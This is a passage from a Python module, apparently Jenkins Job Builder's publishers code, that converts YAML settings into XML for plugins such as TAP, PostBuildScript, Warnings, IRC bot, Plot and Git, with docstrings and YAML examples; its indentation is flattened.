:arg bool verbose: Print a message for each TAP stream file (>=1.17)
(default true)
:arg bool show-only-failures: show only test failures (>=1.17)
(default false)
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/tap-full.yaml
:language: yaml
Minimal Example:
.. literalinclude:: /../../tests/publishers/fixtures/tap-minimal.yaml
:language: yaml
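An inline sketch for orientation (the results glob is a placeholder):

.. code-block:: yaml

    publishers:
      - tap:
          results: 'target/tap/*.tap'
          fail-if-no-results: true
          todo-is-failure: false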
"""
tap = XML.SubElement(xml_parent, 'org.tap4j.plugin.TapPublisher')
tap.set('plugin', 'tap')
mappings = [
('results', 'testResults', None),
('fail-if-no-results', 'failIfNoResults', False),
('failed-tests-mark-build-as-failure',
'failedTestsMarkBuildAsFailure',
False),
('output-tap-to-console', 'outputTapToConsole', True),
('enable-subtests', 'enableSubtests', True),
('discard-old-reports', 'discardOldReports', False),
('todo-is-failure', 'todoIsFailure', True),
('include-comment-diagnostics', 'includeCommentDiagnostics', False),
('validate-tests', 'validateNumberOfTests', False),
('plan-required', 'planRequired', True),
('verbose', 'verbose', True),
('show-only-failures', 'showOnlyFailures', False),
]
helpers.convert_mapping_to_xml(tap, data, mappings, fail_required=True)
def post_tasks(parser, xml_parent, data):
"""yaml: post-tasks
Adds support to post build task plugin
Requires the Jenkins :jenkins-wiki:`Post Build Task plugin
<Post+build+task>`.
:arg dict task: Post build task definition
:arg list task[matches]: list of matches when to run the task
:arg dict task[matches][*]: match definition
:arg str task[matches][*][log-text]: text to match against the log
:arg str task[matches][*][operator]: operator to apply with the next match
:task[matches][*][operator] values (default 'AND'):
* **AND**
* **OR**
:arg bool task[escalate-status]: Escalate the task status to the job
(default 'false')
:arg bool task[run-if-job-successful]: Run only if the job was successful
(default 'false')
:arg str task[script]: Shell script to run (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/post-tasks001.yaml
:language: yaml
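For orientation, a sketch of a single task (the log text and script path
are placeholders):

.. code-block:: yaml

    publishers:
      - post-tasks:
          - matches:
              - log-text: 'Database connection refused'
                operator: AND
            escalate-status: true
            run-if-job-successful: false
            script: './scripts/cleanup.sh'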
"""
pb_xml = XML.SubElement(xml_parent,
'hudson.plugins.postbuildtask.PostbuildTask')
tasks_xml = XML.SubElement(pb_xml, 'tasks')
for task in data:
task_xml = XML.SubElement(
tasks_xml,
'hudson.plugins.postbuildtask.TaskProperties')
matches_xml = XML.SubElement(task_xml, 'logTexts')
for match in task.get('matches', []):
lt_xml = XML.SubElement(
matches_xml,
'hudson.plugins.postbuildtask.LogProperties')
XML.SubElement(lt_xml, 'logText').text = str(
match.get('log-text', False) or '')
XML.SubElement(lt_xml, 'operator').text = str(
match.get('operator', 'AND')).upper()
XML.SubElement(task_xml, 'EscalateStatus').text = str(
task.get('escalate-status', False)).lower()
XML.SubElement(task_xml, 'RunIfJobSuccessful').text = str(
task.get('run-if-job-successful', False)).lower()
XML.SubElement(task_xml, 'script').text = str(
task.get('script', ''))
def postbuildscript(parser, xml_parent, data):
"""yaml: postbuildscript
Executes additional builders, script or Groovy after the build is
complete.
Requires the Jenkins :jenkins-wiki:`Post Build Script plugin
<PostBuildScript+Plugin>`.
:arg list generic-script: Paths to Batch/Shell scripts
:arg list groovy-script: Paths to Groovy scripts
:arg list groovy: Inline Groovy
:arg list builders: Any supported builders, see :doc:`builders`.
:arg bool onsuccess: Deprecated, replaced with script-only-if-succeeded
:arg bool script-only-if-succeeded: Scripts and builders are run only if
the build succeeded (default true)
:arg bool onfailure: Deprecated, replaced with script-only-if-failed
:arg bool script-only-if-failed: Scripts and builders are run only if the
build failed (default false)
:arg bool mark-unstable-if-failed: Build will be marked unstable
if job will be successfully completed
but publishing script will return
non zero exit code (default false)
:arg str execute-on: For matrix projects, scripts can be run after each
axis is built (`axes`), after all axis of the matrix
are built (`matrix`) or after each axis AND the matrix
are built (`both`).
The `script-only-if-succeeded` and `script-only-if-failed` options are
confusing. If you want the post-build scripts to always run regardless of
the build status, you should set them both to `false`.
Example:
.. literalinclude::
/../../tests/publishers/fixtures/postbuildscript001.yaml
:language: yaml
You can also execute :doc:`builders </builders>`:
.. literalinclude::
/../../tests/publishers/fixtures/postbuildscript002.yaml
:language: yaml
Run once after the whole matrix (all axes) is built:
.. literalinclude::
/../../tests/publishers/fixtures/postbuildscript003.yaml
:language: yaml
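A rough sketch combining a script file with inline Groovy (the paths and
the Groovy one-liner are placeholders):

.. code-block:: yaml

    publishers:
      - postbuildscript:
          generic-script:
            - 'scripts/archive-logs.sh'
          groovy:
            - 'println "post build step"'
          script-only-if-succeeded: false
          script-only-if-failed: false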
"""
pbs_xml = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.postbuildscript.PostBuildScript')
# Shell/Groovy in a file
script_types = {
'generic-script': 'GenericScript',
'groovy-script': 'GroovyScriptFile',
}
# Assuming yaml preserves the order of the input data, make sure the
# corresponding XML steps are generated in the same order
build_scripts = [(k, v) for k, v in data.items()
if k in script_types or k in ['groovy', 'builders']]
for step, script_data in build_scripts:
if step in script_types:
scripts_xml = XML.SubElement(pbs_xml, step[:-len('-script')] +
'ScriptFileList')
for shell_script in script_data:
script_xml = XML.SubElement(
scripts_xml,
'org.jenkinsci.plugins.postbuildscript.'
+ script_types[step])
file_path_xml = XML.SubElement(script_xml, 'filePath')
file_path_xml.text = shell_script
# Inlined Groovy
if step == 'groovy':
groovy_inline_xml = XML.SubElement(pbs_xml,
'groovyScriptContentList')
for groovy in script_data:
groovy_xml = XML.SubElement(
groovy_inline_xml,
'org.jenkinsci.plugins.postbuildscript.GroovyScriptContent'
)
groovy_content = XML.SubElement(groovy_xml, 'content')
groovy_content.text = groovy
# Inject builders
if step == 'builders':
build_steps_xml = XML.SubElement(pbs_xml, 'buildSteps')
for builder in script_data:
parser.registry.dispatch('builder', parser, build_steps_xml,
builder)
# When should the scripts run? Note the plugin lets one specify both
# options although they are mutually exclusive.
# The onsuccess and onfailure parameters are deprecated; they are kept for
# backwards compatibility.
success_xml = XML.SubElement(pbs_xml, 'scriptOnlyIfSuccess')
if 'script-only-if-succeeded' in data:
success_xml.text = str(data.get('script-only-if-succeeded',
True)).lower()
else:
success_xml.text = str(data.get('onsuccess', True)).lower()
failure_xml = XML.SubElement(pbs_xml, 'scriptOnlyIfFailure')
if 'script-only-if-failed' in data:
failure_xml.text = str(data.get('script-only-if-failed',
False)).lower()
else:
failure_xml.text = str(data.get('onfailure', False)).lower()
# Mark build unstable if publisher script return non zero exit code
XML.SubElement(pbs_xml, 'markBuildUnstable').text = str(
data.get('mark-unstable-if-failed', False)).lower()
# TODO: we may want to avoid setting "execute-on" on non-matrix jobs,
# either by skipping this part or by raising an error to let the user know
# an attempt was made to set execute-on on a non-matrix job. There are
# currently no easy ways to check for this though.
if 'execute-on' in data:
valid_values = ('matrix', 'axes', 'both')
execute_on = data['execute-on'].lower()
if execute_on not in valid_values:
raise JenkinsJobsException(
'execute-on must be one of %s, got %s' % (valid_values, execute_on)
)
execute_on_xml = XML.SubElement(pbs_xml, 'executeOn')
execute_on_xml.text = execute_on.upper()
def xml_summary(parser, xml_parent, data):
"""yaml: xml-summary
Adds support for the Summary Display Plugin
Requires the Jenkins :jenkins-wiki:`Summary Display Plugin
<Summary+Display+Plugin>`.
:arg str files: Files to parse (default '')
:arg bool shown-on-project-page: Display summary on project page
(default 'false')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/xml-summary001.yaml
:language: yaml
"""
summary = XML.SubElement(xml_parent,
'hudson.plugins.summary__report.'
'ACIPluginPublisher')
XML.SubElement(summary, 'name').text = data['files']
XML.SubElement(summary, 'shownOnProjectPage').text = str(
data.get('shown-on-project-page', 'false'))
def robot(parser, xml_parent, data):
"""yaml: robot
Adds support for the Robot Framework Plugin
Requires the Jenkins :jenkins-wiki:`Robot Framework Plugin
<Robot+Framework+Plugin>`.
:arg str output-path: Path to directory containing robot xml and html files
relative to build workspace. (default '')
:arg str log-file-link: Name of log or report file to be linked on jobs
front page (default '')
:arg str report-html: Name of the html file containing robot test report
(default 'report.html')
:arg str log-html: Name of the html file containing detailed robot test log
(default 'log.html')
:arg str output-xml: Name of the xml file containing robot output
(default 'output.xml')
:arg str pass-threshold: Minimum percentage of passed tests to consider
the build successful (default 0.0)
:arg str unstable-threshold: Minimum percentage of passed test to
consider the build as not failed (default 0.0)
:arg bool only-critical: Take only critical tests into account when
checking the thresholds (default true)
:arg list other-files: list other files to archive (default '')
:arg bool archive-output-xml: Archive output xml file to server
(default true)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/robot001.yaml
:language: yaml
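An illustrative configuration (paths and thresholds are placeholders):

.. code-block:: yaml

    publishers:
      - robot:
          output-path: 'reports/robot'
          pass-threshold: 95.0
          unstable-threshold: 80.0
          only-critical: false
          other-files:
            - 'selenium-screenshot.png'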
"""
parent = XML.SubElement(xml_parent, 'hudson.plugins.robot.RobotPublisher')
XML.SubElement(parent, 'outputPath').text = data['output-path']
XML.SubElement(parent, 'logFileLink').text = str(
data.get('log-file-link', ''))
XML.SubElement(parent, 'reportFileName').text = str(
data.get('report-html', 'report.html'))
XML.SubElement(parent, 'logFileName').text = str(
data.get('log-html', 'log.html'))
XML.SubElement(parent, 'outputFileName').text = str(
data.get('output-xml', 'output.xml'))
XML.SubElement(parent, 'passThreshold').text = str(
data.get('pass-threshold', 0.0))
XML.SubElement(parent, 'unstableThreshold').text = str(
data.get('unstable-threshold', 0.0))
XML.SubElement(parent, 'onlyCritical').text = str(
data.get('only-critical', True)).lower()
other_files = XML.SubElement(parent, 'otherFiles')
for other_file in data.get('other-files', []):
XML.SubElement(other_files, 'string').text = str(other_file)
XML.SubElement(parent, 'disableArchiveOutput').text = str(
not data.get('archive-output-xml', True)).lower()
def warnings(parser, xml_parent, data):
"""yaml: warnings
Generate trend report for compiler warnings in the console log or
in log files. Requires the Jenkins :jenkins-wiki:`Warnings Plugin
<Warnings+Plugin>`.
:arg list console-log-parsers: The parser to use to scan the console
log (default '')
:arg dict workspace-file-scanners:
:workspace-file-scanners:
* **file-pattern** (`str`) -- Fileset 'includes' setting that
specifies the files to scan for warnings
* **scanner** (`str`) -- The parser to use to scan the files
provided in workspace-file-pattern (default '')
:arg str files-to-include: Comma separated list of regular
expressions that specifies the files to include in the report
(based on their absolute filename). By default all files are
included
:arg str files-to-ignore: Comma separated list of regular expressions
that specifies the files to exclude from the report (based on their
absolute filename). (default '')
:arg bool run-always: By default, this plug-in runs only for stable or
unstable builds, but not for failed builds. Set to true if the
plug-in should run even for failed builds. (default false)
:arg bool detect-modules: Determines if Ant or Maven modules should be
detected for all files that contain warnings. Activating this
option may increase your build time since the detector scans
the whole workspace for 'build.xml' or 'pom.xml' files in order
to assign the correct module names. (default false)
:arg bool resolve-relative-paths: Determines if relative paths in
warnings should be resolved using a time expensive operation that
scans the whole workspace for matching files. Deactivate this
option if you encounter performance problems. (default false)
:arg int health-threshold-high: The upper threshold for the build
health. If left empty then no health report is created. If
the actual number of warnings is between the provided
thresholds then the build health is interpolated (default '')
:arg int health-threshold-low: The lower threshold for the build
health. See health-threshold-high. (default '')
:arg dict health-priorities: Determines which warning priorities
should be considered when evaluating the build health (default
all-priorities)
:health-priorities values:
* **priority-high** -- Only priority high
* **high-and-normal** -- Priorities high and normal
* **all-priorities** -- All priorities
:arg dict total-thresholds: If the number of total warnings is greater
than one of these thresholds then a build is considered as unstable
or failed, respectively. (default '')
:total-thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
:arg dict new-thresholds: If the specified number of new warnings exceeds
one of these thresholds then a build is considered as unstable or
failed, respectively. (default '')
:new-thresholds:
* **unstable** (`dict`)
:unstable: * **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg bool use-delta-for-new-warnings: If set then the number of new
warnings is calculated by subtracting the total number of warnings
of the current build from the reference build. This may lead to wrong
results if you have both fixed and new warnings in a build. If not set,
then the number of new warnings is calculated by an asymmetric set
difference of the warnings in the current and reference build. This
will find all new warnings even if the number of total warnings is
decreasing. However, sometimes false positives will be reported due
to minor changes in a warning (refactoring of variable or method
names, etc.) (default false)
:arg bool use-previous-build-as-reference: If set the number of new
warnings will always be computed based on the previous build, even if
that build is unstable (due to a violated warning threshold).
Otherwise the last build that did not violate any given threshold will
be used as
reference. It is recommended to uncheck this option if the plug-in
should ensure that all new warnings will be finally fixed in subsequent
builds. (default false)
:arg bool only-use-stable-builds-as-reference: The number of new warnings
will be calculated based on the last stable build, allowing reverts
of unstable builds where the number of warnings was decreased.
(default false)
:arg str default-encoding: Default encoding when parsing or showing files
Leave empty to use default encoding of platform (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/warnings001.yaml
:language: yaml
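A rough sketch of a typical configuration; the parser and scanner names
depend on the parsers registered in your Warnings plugin installation and
are placeholders here:

.. code-block:: yaml

    publishers:
      - warnings:
          console-log-parsers:
            - 'GNU Make + GNU C Compiler (gcc)'
          workspace-file-scanners:
            - file-pattern: '**/pylint.log'
              scanner: 'PyLint'
          total-thresholds:
            unstable:
              total-all: 100
            failed:
              total-all: 500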
"""
warnings = XML.SubElement(xml_parent,
'hudson.plugins.warnings.'
'WarningsPublisher')
console = XML.SubElement(warnings, 'consoleParsers')
for parser in data.get('console-log-parsers', []):
console_parser = XML.SubElement(console,
'hudson.plugins.warnings.'
'ConsoleParser')
XML.SubElement(console_parser, 'parserName').text = parser
workspace = XML.SubElement(warnings, 'parserConfigurations')
for wfs in data.get('workspace-file-scanners', []):
workspace_pattern = XML.SubElement(workspace,
'hudson.plugins.warnings.'
'ParserConfiguration')
XML.SubElement(workspace_pattern, 'pattern').text = \
wfs['file-pattern']
XML.SubElement(workspace_pattern, 'parserName').text = \
wfs['scanner']
warnings_to_include = data.get('files-to-include', '')
XML.SubElement(warnings, 'includePattern').text = warnings_to_include
warnings_to_ignore = data.get('files-to-ignore', '')
XML.SubElement(warnings, 'excludePattern').text = warnings_to_ignore
run_always = str(data.get('run-always', False)).lower()
XML.SubElement(warnings, 'canRunOnFailed').text = run_always
detect_modules = str(data.get('detect-modules', False)).lower()
XML.SubElement(warnings, 'shouldDetectModules').text = detect_modules
# Note the logic reversal (included here to match the GUI)
XML.SubElement(warnings, 'doNotResolveRelativePaths').text = \
str(not data.get('resolve-relative-paths', False)).lower()
health_threshold_high = str(data.get('health-threshold-high', ''))
XML.SubElement(warnings, 'healthy').text = health_threshold_high
health_threshold_low = str(data.get('health-threshold-low', ''))
XML.SubElement(warnings, 'unHealthy').text = health_threshold_low
prioritiesDict = {'priority-high': 'high',
'high-and-normal': 'normal',
'all-priorities': 'low'}
priority = data.get('health-priorities', 'all-priorities')
if priority not in prioritiesDict:
raise JenkinsJobsException("Health-Priority entered is not valid must "
"be one of: %s" %
",".join(prioritiesDict.keys()))
XML.SubElement(warnings, 'thresholdLimit').text = prioritiesDict[priority]
td = XML.SubElement(warnings, 'thresholds')
for base in ["total", "new"]:
thresholds = data.get("%s-thresholds" % base, {})
for status in ["unstable", "failed"]:
bystatus = thresholds.get(status, {})
for level in ["all", "high", "normal", "low"]:
val = str(bystatus.get("%s-%s" % (base, level), ''))
XML.SubElement(td, "%s%s%s" % (status,
base.capitalize(), level.capitalize())
).text = val
if data.get('new-thresholds'):
XML.SubElement(warnings, 'dontComputeNew').text = 'false'
delta = data.get('use-delta-for-new-warnings', False)
XML.SubElement(warnings, 'useDeltaValues').text = str(delta).lower()
use_previous_build = data.get('use-previous-build-as-reference', False)
XML.SubElement(warnings, 'usePreviousBuildAsReference').text = str(
use_previous_build).lower()
use_stable_builds = data.get('only-use-stable-builds-as-reference',
False)
XML.SubElement(warnings, 'useStableBuildAsReference').text = str(
use_stable_builds).lower()
else:
XML.SubElement(warnings, 'dontComputeNew').text = 'true'
XML.SubElement(warnings, 'useStableBuildAsReference').text = 'false'
XML.SubElement(warnings, 'useDeltaValues').text = 'false'
encoding = data.get('default-encoding', '')
XML.SubElement(warnings, 'defaultEncoding').text = encoding
def sloccount(parser, xml_parent, data):
"""yaml: sloccount
Generates the trend report for SLOCCount
Requires the Jenkins :jenkins-wiki:`SLOCCount Plugin <SLOCCount+Plugin>`.
:arg str report-files: Setting that specifies the generated raw
SLOCCount report files.
Be sure not to include any non-report files into
this pattern. The report files must have been
generated by sloccount using the
"--wide --details" options.
(default '\*\*/sloccount.sc')
:arg str charset: The character encoding to be used to read the SLOCCount
result files. (default 'UTF-8')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/sloccount001.yaml
:language: yaml
"""
top = XML.SubElement(xml_parent,
'hudson.plugins.sloccount.SloccountPublisher')
XML.SubElement(top, 'pattern').text = data.get('report-files',
'**/sloccount.sc')
XML.SubElement(top, 'encoding').text = data.get('charset', 'UTF-8')
def ircbot(parser, xml_parent, data):
"""yaml: ircbot
ircbot enables Jenkins to send build notifications via IRC and lets you
interact with Jenkins via an IRC bot.
Requires the Jenkins :jenkins-wiki:`IRC Plugin <IRC+Plugin>`.
:arg string strategy: When to send notifications
:strategy values:
* **all** always (default)
* **any-failure** on any failure
* **failure-and-fixed** on failure and fixes
* **new-failure-and-fixed** on new failure and fixes
* **statechange-only** only on state change
:arg bool notify-start: Whether to send notifications to channels when a
build starts
(default false)
:arg bool notify-committers: Whether to send notifications to the users
that are suspected of having broken this build
(default false)
:arg bool notify-culprits: Also send notifications to 'culprits' from
previous unstable/failed builds
(default false)
:arg bool notify-upstream: Whether to send notifications to upstream
committers if no committers were found for a
broken build
(default false)
:arg bool notify-fixers: Whether to send notifications to the users that
have fixed a broken build
(default false)
:arg string message-type: Channel Notification Message.
:message-type values:
* **summary-scm** for summary and SCM changes (default)
* **summary** for summary only
* **summary-params** for summary and build parameters
* **summary-scm-fail** for summary, SCM changes and failures
:arg list channels: list channels definitions
If empty, it takes channel from Jenkins configuration.
(default empty)
WARNING: the IRC plugin requires the channel to be
configured in the system wide configuration or the jobs
will fail to emit notifications to the channel
:Channel: * **name** (`str`) Channel name
* **password** (`str`) Channel password (optional)
* **notify-only** (`bool`) Set to true if you want to
disallow bot commands (default false)
:arg string matrix-notifier: notify for matrix projects
instant-messaging-plugin injects an additional
field in the configuration form whenever the
project is a multi-configuration project
:matrix-notifier values:
* **all**
* **only-configurations** (default)
* **only-parent**
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ircbot001.yaml
:language: yaml
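An illustrative configuration (the channel name and password are
placeholders):

.. code-block:: yaml

    publishers:
      - ircbot:
          strategy: failure-and-fixed
          message-type: summary-scm
          notify-committers: true
          channels:
            - name: '#my-jenkins-channel'
              password: 'secret'
              notify-only: true
          matrix-notifier: only-parent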
"""
top = XML.SubElement(xml_parent, 'hudson.plugins.ircbot.IrcPublisher')
message_dict = {'summary-scm': 'DefaultBuildToChatNotifier',
'summary': 'SummaryOnlyBuildToChatNotifier',
'summary-params': 'BuildParametersBuildToChatNotifier',
'summary-scm-fail': 'PrintFailingTestsBuildToChatNotifier'}
message = data.get('message-type', 'summary-scm')
if message not in message_dict:
raise JenkinsJobsException("message-type entered is not valid, must "
"be one of: %s" %
", ".join(message_dict.keys()))
message = "hudson.plugins.im.build_notify." + message_dict.get(message)
XML.SubElement(top, 'buildToChatNotifier', attrib={'class': message})
strategy_dict = {'all': 'ALL',
'any-failure': 'ANY_FAILURE',
'failure-and-fixed': 'FAILURE_AND_FIXED',
'new-failure-and-fixed': 'NEW_FAILURE_AND_FIXED',
'statechange-only': 'STATECHANGE_ONLY'}
strategy = data.get('strategy', 'all')
if strategy not in strategy_dict:
raise JenkinsJobsException("strategy entered is not valid, must be "
"one of: %s" %
", ".join(strategy_dict.keys()))
XML.SubElement(top, 'strategy').text = strategy_dict.get(strategy)
targets = XML.SubElement(top, 'targets')
channels = data.get('channels', [])
for channel in channels:
sub = XML.SubElement(targets,
'hudson.plugins.im.GroupChatIMMessageTarget')
XML.SubElement(sub, 'name').text = channel.get('name')
XML.SubElement(sub, 'password').text = channel.get('password')
XML.SubElement(sub, 'notificationOnly').text = str(
channel.get('notify-only', False)).lower()
XML.SubElement(top, 'notifyOnBuildStart').text = str(
data.get('notify-start', False)).lower()
XML.SubElement(top, 'notifySuspects').text = str(
data.get('notify-committers', False)).lower()
XML.SubElement(top, 'notifyCulprits').text = str(
data.get('notify-culprits', False)).lower()
XML.SubElement(top, 'notifyFixers').text = str(
data.get('notify-fixers', False)).lower()
XML.SubElement(top, 'notifyUpstreamCommitters').text = str(
data.get('notify-upstream', False)).lower()
matrix_dict = {'all': 'ALL',
'only-configurations': 'ONLY_CONFIGURATIONS',
'only-parent': 'ONLY_PARENT'}
matrix = data.get('matrix-notifier', 'only-configurations')
if matrix not in matrix_dict:
raise JenkinsJobsException("matrix-notifier entered is not valid, "
"must be one of: %s" %
", ".join(matrix_dict.keys()))
XML.SubElement(top, 'matrixMultiplier').text = matrix_dict.get(matrix)
def plot(parser, xml_parent, data):
"""yaml: plot
Plot provides generic plotting (or graphing).
Requires the Jenkins :jenkins-wiki:`Plot Plugin <Plot+Plugin>`.
:arg str title: title for the graph (default '')
:arg str yaxis: title of Y axis (default '')
:arg str group: name of the group to which the plot belongs (required)
:arg int num-builds: number of builds to plot across
(default plot all builds)
:arg str style: Specifies the graph style of the plot
Can be: area, bar, bar3d, line, line3d, stackedArea, stackedbar,
stackedbar3d, waterfall (default 'line')
:arg bool use-description: When false, the X-axis labels are formed using
build numbers and dates, and the corresponding tooltips contain the
build descriptions. When enabled, the contents of the labels and
tooltips are swapped, with the descriptions used as X-axis labels and
the build number and date used for tooltips. (default false)
:arg bool exclude-zero-yaxis: When false, Y-axis contains the value zero
even if it is not included in the data series. When true, the value
zero is not automatically included. (default false)
:arg bool logarithmic-yaxis: When true, the Y-axis will use a logarithmic
scale. By default, the Y-axis uses a linear scale. (default false)
:arg bool keep-records: When true, show all builds up to 'Number of
builds to include'. (default false)
:arg str csv-file-name: Choose the file name in which the data will be
persisted. If none is specified, a random name is generated, as done in
the Jenkins Plot plugin. (default: randomly generated .csv filename, same
behaviour as the Jenkins Plot plugin)
:arg list series: list data series definitions
:Serie: * **file** (`str`) : files to include
* **inclusion-flag** filtering mode for CSV files. Possible
values are:
* **off** (default)
* **include-by-string**
* **exclude-by-string**
* **include-by-column**
* **exclude-by-column**
* **exclude** (`str`) : exclude pattern for CSV file.
* **url** (`str`) : for 'csv' and 'xml' file types
used when you click on a point (default empty)
* **display-table** (`bool`) : for 'csv' file type
if true, original CSV will be shown above plot (default false)
* **label** (`str`) : used by 'properties' file type
Specifies the legend label for this data series.
(default empty)
* **format** (`str`) : Type of file from which the data is read.
Can be: properties, csv, xml
* **xpath-type** (`str`) : The result type of the expression must
be supplied due to limitations in the java.xml.xpath parsing.
The result can be: node, nodeset, boolean, string, or number.
Strings and numbers will be converted to double. Boolean will
be converted to 1 for true, and 0 for false. (default 'node')
* **xpath** (`str`) : used by 'xml' file type
Xpath which selects the values that should be plotted.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/plot004.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/plot005.yaml
:language: yaml
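For orientation, a sketch of a single plot with one properties-based data
series (file names, group and titles are placeholders):

.. code-block:: yaml

    publishers:
      - plot:
          - title: 'Line coverage'
            yaxis: 'percent'
            group: 'coverage'
            num-builds: '40'
            style: line
            series:
              - file: 'coverage.properties'
                label: 'lines covered'
                format: properties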
"""
top = XML.SubElement(xml_parent, 'hudson.plugins.plot.PlotPublisher')
plots = XML.SubElement(top, 'plots')
format_dict = {'properties': 'hudson.plugins.plot.PropertiesSeries',
'csv': 'hudson.plugins.plot.CSVSeries',
'xml': 'hudson.plugins.plot.XMLSeries'}
xpath_dict = {'nodeset': 'NODESET', 'node': 'NODE', 'string': 'STRING',
'boolean': 'BOOLEAN', 'number': 'NUMBER'}
inclusion_dict = {'off': 'OFF',
'include-by-string': 'INCLUDE_BY_STRING',
'exclude-by-string': 'EXCLUDE_BY_STRING',
'include-by-column': 'INCLUDE_BY_COLUMN',
'exclude-by-column': 'EXCLUDE_BY_COLUMN'}
for plot in data:
plugin = XML.SubElement(plots, 'hudson.plugins.plot.Plot')
XML.SubElement(plugin, 'title').text = plot.get('title', '')
XML.SubElement(plugin, 'yaxis').text = plot['yaxis']
XML.SubElement(plugin, 'csvFileName').text = \
plot.get('csv-file-name', '%s.csv' % random.randrange(2 << 32))
topseries = XML.SubElement(plugin, 'series')
series = plot['series']
for serie in series:
format_data = serie.get('format')
if format_data not in format_dict:
raise JenkinsJobsException("format entered is not valid, must "
"be one of: %s" %
" , ".join(format_dict.keys()))
subserie = XML.SubElement(topseries, format_dict.get(format_data))
XML.SubElement(subserie, 'file').text = serie.get('file')
if format_data == 'properties':
XML.SubElement(subserie, 'label').text = serie.get('label', '')
if format_data == 'csv':
inclusion_flag = serie.get('inclusion-flag', 'off')
if inclusion_flag not in inclusion_dict:
raise JenkinsJobsException("Inclusion flag result entered "
"is not valid, must be one of: "
"%s"
% ", ".join(inclusion_dict))
XML.SubElement(subserie, 'inclusionFlag').text = \
inclusion_dict.get(inclusion_flag)
XML.SubElement(subserie, 'exclusionValues').text = \
serie.get('exclude', '')
if serie.get('exclude', ''):
exclude_strings = serie.get('exclude', '').split(',')
exclusionset = XML.SubElement(subserie, 'strExclusionSet')
for exclude_string in exclude_strings:
XML.SubElement(exclusionset, 'string').text = \
exclude_string
XML.SubElement(subserie, 'url').text = serie.get('url', '')
XML.SubElement(subserie, 'displayTableFlag').text = \
str(serie.get('display-table', False)).lower()
if format_data == 'xml':
XML.SubElement(subserie, 'url').text = serie.get('url', '')
XML.SubElement(subserie, 'xpathString').text = \
serie.get('xpath')
xpathtype = serie.get('xpath-type', 'node')
if xpathtype not in xpath_dict:
raise JenkinsJobsException("XPath result entered is not "
"valid, must be one of: %s" %
", ".join(xpath_dict))
XML.SubElement(subserie, 'nodeTypeString').text = \
xpath_dict.get(xpathtype)
XML.SubElement(subserie, 'fileType').text = serie.get('format')
mappings = [
('group', 'group', None),
('use-description', 'useDescr', False),
('exclude-zero-yaxis', 'exclZero', False),
('logarithmic-yaxis', 'logarithmic', False),
('keep-records', 'keepRecords', False),
('num-builds', 'numBuilds', '')]
helpers.convert_mapping_to_xml(
plugin, plot, mappings, fail_required=True)
style_list = ['area', 'bar', 'bar3d', 'line', 'line3d', 'stackedArea',
'stackedbar', 'stackedbar3d', 'waterfall']
style = plot.get('style', 'line')
if style not in style_list:
raise JenkinsJobsException("style entered is not valid, must be "
"one of: %s" % ", ".join(style_list))
XML.SubElement(plugin, 'style').text = style
def git(parser, xml_parent, data):
"""yaml: git
This plugin will configure the Jenkins Git plugin to
push merge results, tags, and/or branches to
remote repositories after the job completes.
Requires the Jenkins :jenkins-wiki:`Git Plugin <Git+Plugin>`.
:arg bool push-merge: push merges back to the origin specified in the
pre-build merge options (default false)
:arg bool push-only-if-success: Only push to remotes if the build succeeds
- otherwise, nothing will be pushed.
(default true)
:arg bool force-push: Add force option to git push (default false)
:arg list tags: tags to push at the completion of the build
:tag: * **remote** (`str`) remote repo name to push to
(default 'origin')
* **name** (`str`) name of tag to push
* **message** (`str`) message content of the tag
* **create-tag** (`bool`) whether or not to create the tag
after the build, if this is False then the tag needs to
exist locally (default false)
* **update-tag** (`bool`) whether to overwrite a remote tag
or not (default false)
:arg list branches: branches to push at the completion of the build
:branch: * **remote** (`str`) remote repo name to push to
(default 'origin')
* **name** (`str`) name of remote branch to push to
:arg list notes: notes to push at the completion of the build
:note: * **remote** (`str`) remote repo name to push to
(default 'origin')
* **message** (`str`) content of the note
* **namespace** (`str`) namespace of the note
(default master)
* **replace-note** (`bool`) whether to overwrite a note or not
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/git001.yaml
:language: yaml
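An illustrative configuration pushing a tag and a branch (the remote, tag
and branch names are placeholders):

.. code-block:: yaml

    publishers:
      - git:
          push-only-if-success: true
          tags:
            - tag:
                remote: origin
                name: 'build-${BUILD_NUMBER}'
                message: 'Tagged by Jenkins'
                create-tag: true
          branches:
            - branch:
                remote: origin
                name: 'last-successful'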
"""
mappings = [('push-merge', 'pushMerge', False),
('push-only-if-success', 'pushOnlyIfSuccess', True),
('force-push', 'forcePush', False)]
tag_mappings = [('remote', 'targetRepoName', 'origin'),
('name', 'tagName', None),
('message', 'tagMessage', ''),
('create-tag', 'createTag', False),
('update-tag', 'updateTag', False)]
branch_mappings = [('remote', 'targetRepoName', 'origin'),
('name', 'branchName', None)]
note_mappings = [('remote', 'targetRepoName', 'origin'),
('message', 'noteMsg', None),
('namespace', 'noteNamespace', 'master'),
('replace-note', 'noteReplace', False)]
def handle_entity_children(entity, entity_xml, child_mapping):
for prop in child_mapping:
opt, xmlopt, default_val = prop[:3]
val = entity.get(opt, default_val)
if val is None:
raise JenkinsJobsException('Required option missing: %s' % opt)
if isinstance(val, bool):
val = str(val).lower()
XML.SubElement(entity_xml, xmlopt).text = val
top = XML.SubElement(xml_parent, 'hudson.plugins.git.GitPublisher')
XML.SubElement(top, 'configVersion').text = '2'
handle_entity_children(data, top, mappings)
tags = data.get('tags', [])
if tags:
xml_tags = XML.SubElement(top, 'tagsToPush')
for tag in tags:
xml_tag = XML.SubElement(
xml_tags,
'hudson.plugins.git.GitPublisher_-TagToPush')
handle_entity_children(tag['tag'], xml_tag, tag_mappings)
branches = data.get('branches', [])
if branches:
xml_branches = XML.SubElement(top, 'branchesToPush')
